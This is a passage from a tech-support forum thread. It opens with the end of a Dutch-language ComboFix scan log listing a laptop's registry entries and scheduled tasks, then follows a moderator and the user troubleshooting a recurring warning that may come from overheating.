[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]

2016-01-30 11:30 1090376 ----a-w- c:\program files (x86)\Google\Chrome\Application\48.0.2564.97\Installer\chrmstp.exe

Inhoud van de 'Gedeelde Taken' map

2016-01-31 c:\windows\Tasks\Adobe Flash Player Updater.job

- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-10 22:39]

2016-01-31 c:\windows\Tasks\DropboxUpdateTaskMachineCore.job

- c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-01-30 11:34]

2016-01-31 c:\windows\Tasks\DropboxUpdateTaskMachineUA.job

- c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-01-30 11:34]

2016-01-31 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000Core.job

- c:\users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-17 18:50]

2016-01-31 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000UA.job

- c:\users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-17 18:50]

2016-01-31 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job

- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-01-27 13:29]

2016-01-31 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job

- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-01-27 13:29]

--------- X64 Entries -----------

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt1]

@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt2]

@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt3]

@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt4]

@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt5]

@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt6]

@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt7]

@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt8]

@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon1]

@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}"

[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}]

2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon2]

@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}"

[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}]

2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon3]

@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}"

[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}]

2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon4]

@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"

[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}]

2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1EldosIconOverlay]

@="{904FB7E2-AD8B-45AF-B3A2-D309F7514790}"

[HKEY_CLASSES_ROOT\CLSID\{904FB7E2-AD8B-45AF-B3A2-D309F7514790}]

2012-04-09 14:27 190480 ----a-w- c:\windows\System32\CbFsMntNtf3.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay]

@="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}"

[HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}]

2012-04-09 14:27 190480 ----a-w- c:\windows\System32\CbFsMntNtf3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2015-04-30 1337000]

"SysTrayApp"="c:\program files\IDT\WDM\sttray64.exe" [2010-03-23 487424]

------- Bijkomende Scan -------

uLocal Page = c:\windows\system32\blank.htm

mLocal Page = c:\windows\SysWOW64\blank.htm

IE: &Verzenden naar OneNote - c:\progra~2\MICROS~3\Office14\ONBttnIE.dll/105

IE: Afbeelding verzenden naar &Bluetooth-apparaat... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm

IE: E&xporteren naar Microsoft Excel - c:\progra~2\MICROS~3\Office14\EXCEL.EXE/3000

IE: Pagina verzenden naar &Bluetooth-apparaat... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm

TCP: DhcpNameServer = 192.168.178.1

TCP: Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}: DhcpNameServer = 192.168.178.1

FF - ProfilePath - c:\users\Thomas\AppData\Roaming\Mozilla\Firefox\Profiles\wvk3h4r8.default\

FF - prefs.js: browser.startup.homepage - hxxps://alliances.commandandconquer.com/login/auth?utm_medium=referral&utm_source=www.google.nl&utm_campaign=cca_g-s-holland-cca

- - - - ORPHANS VERWIJDERD - - - -

HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start

AddRemove-SpyHunter - c:\users\Thomas\AppData\Roaming\Enigma Software Group\sh_installer.exe

AddRemove-{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{5e9aae86} - c:\windows\System32\config\systemprofile\AppData\Local\Clip Converter\\clipcnv.dll

AddRemove-UnityWebPlayer - c:\users\Thomas\AppData\Local\Unity\WebPlayer\Uninstall.exe

AddRemove-World in Conflict MW Mod 2.0 Open Beta - 0:\users\Public\Documents\World in Conflict\Mods\MW Mod 2.0 Open Beta Uninstall

--------------------- VERGRENDELDE REGISTER SLEUTELS ---------------------

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]

@Denied: (A 2) (Everyone)

@="FlashBroker"

"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_11_7_700_224_ActiveX.exe,-101"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]

"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]

@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_11_7_700_224_ActiveX.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]

@Denied: (A 2) (Everyone)

@="IFlashBroker5"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]

@="{00020424-0000-0000-C000-000000000046}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

"Version"="1.0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]

@Denied: (A 2) (Everyone)

@="FlashBroker"

"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_7_700_224_ActiveX.exe,-101"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]

"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]

@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_7_700_224_ActiveX.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]

@Denied: (A 2) (Everyone)

@="Shockwave Flash Object"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]

@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_7_700_224.ocx"

"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]

@="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]

@="ShockwaveFlash.ShockwaveFlash.11"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]

@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_7_700_224.ocx, 1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]

@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]

@="1.0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]

@="ShockwaveFlash.ShockwaveFlash"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]

@Denied: (A 2) (Everyone)

@="Macromedia Flash Factory Object"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]

@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_7_700_224.ocx"

"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]

@="FlashFactory.FlashFactory.1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]

@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_7_700_224.ocx, 1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]

@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]

@="1.0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]

@="FlashFactory.FlashFactory"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]

@Denied: (A 2) (Everyone)

@="IFlashBroker5"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]

@="{00020424-0000-0000-C000-000000000046}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

"Version"="1.0"

[HKEY_LOCAL_MACHINE\SOFTWARE\McAfee]

"SymbolicLinkValue"=hex(6):5c,00,72,00,65,00,67,00,69,00,73,00,74,00,72,00,79,

00,5c,00,6d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]

@Denied: (A) (Everyone)

"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]

@Denied: (A) (Everyone)

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]

"Key"="ActionsPane3"

"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]

@Denied: (A) (Users)

@Denied: (A) (Everyone)

@Allowed: (B 1 2 3 4 5) (S-1-5-20)

"BlindDial"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]

@Denied: (A) (Users)

@Denied: (A) (Everyone)

@Allowed: (B 1 2 3 4 5) (S-1-5-20)

"BlindDial"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]

@Denied: (Full) (Everyone)

Voltooingstijd: 2016-01-31 23:27:49

ComboFix-quarantined-files.txt 2016-01-31 22:27

Pre-Run: 57.849.155.584 bytes beschikbaar

Post-Run: 57.438.732.288 bytes beschikbaar

- - End Of File - - 8FDAEE5668B7B6E00B01B26D30D7FAC0

190409C5DEB4517ACAEAFB97B36C57AB

#10
Essexboy

Posted 01 February 2016 - 08:19 AM

GeekU Moderator

Retired Staff
69,964 posts

Do you get the warning every time you boot or when you run a specific programme ?

#11
Tommie

Posted 01 February 2016 - 09:32 AM

Member

Topic Starter
Member
39 posts

The warning pops-up regularly after 1 or 2 hours. Even if the laptop is idle and no programs are running.

#12
Essexboy

Posted 01 February 2016 - 09:55 AM

GeekU Moderator

Retired Staff
69,964 posts

As it is only after a few hours we may have a temperature problem

When the error appears could you run this programme

Download Speedfan and install it. Once it's installed, run the program and post here the information it shows. The information I want you to post is the stuff that is circled in the example picture I have attached.
If you are running on a vista machine, please go to where you installed the program and run the program as administrator.

(this is a screenshot from a vista machine)

#13
Tommie

Posted 01 February 2016 - 11:06 AM

Member

Topic Starter
Member
39 posts

It only shows the temperature info as below. I am not sure if it's a temperature thing. Even if the laptop is in standby and I unlock the laptop to start using it, the message pops-up.

The results in attachment.

Attached Thumbnails

Edited by Tommie, 01 February 2016 - 11:07 AM.

#14
Essexboy

Posted 01 February 2016 - 12:08 PM

GeekU Moderator

Retired Staff
69,964 posts

Does the laptop feel warm underneath ? Are the vents clear as temp 1 is increasing

I believe you are now malware free

#15
Tommie

Posted 02 February 2016 - 11:17 AM

Member

Topic Starter
Member
39 posts

They seem clear. I always use the laptop on my table. It only get's quite warm if I play a game. Just now I get the error again after my laptop has been on standby for a few hours.

Edited by Tommie, 02 February 2016 - 11:18 AM.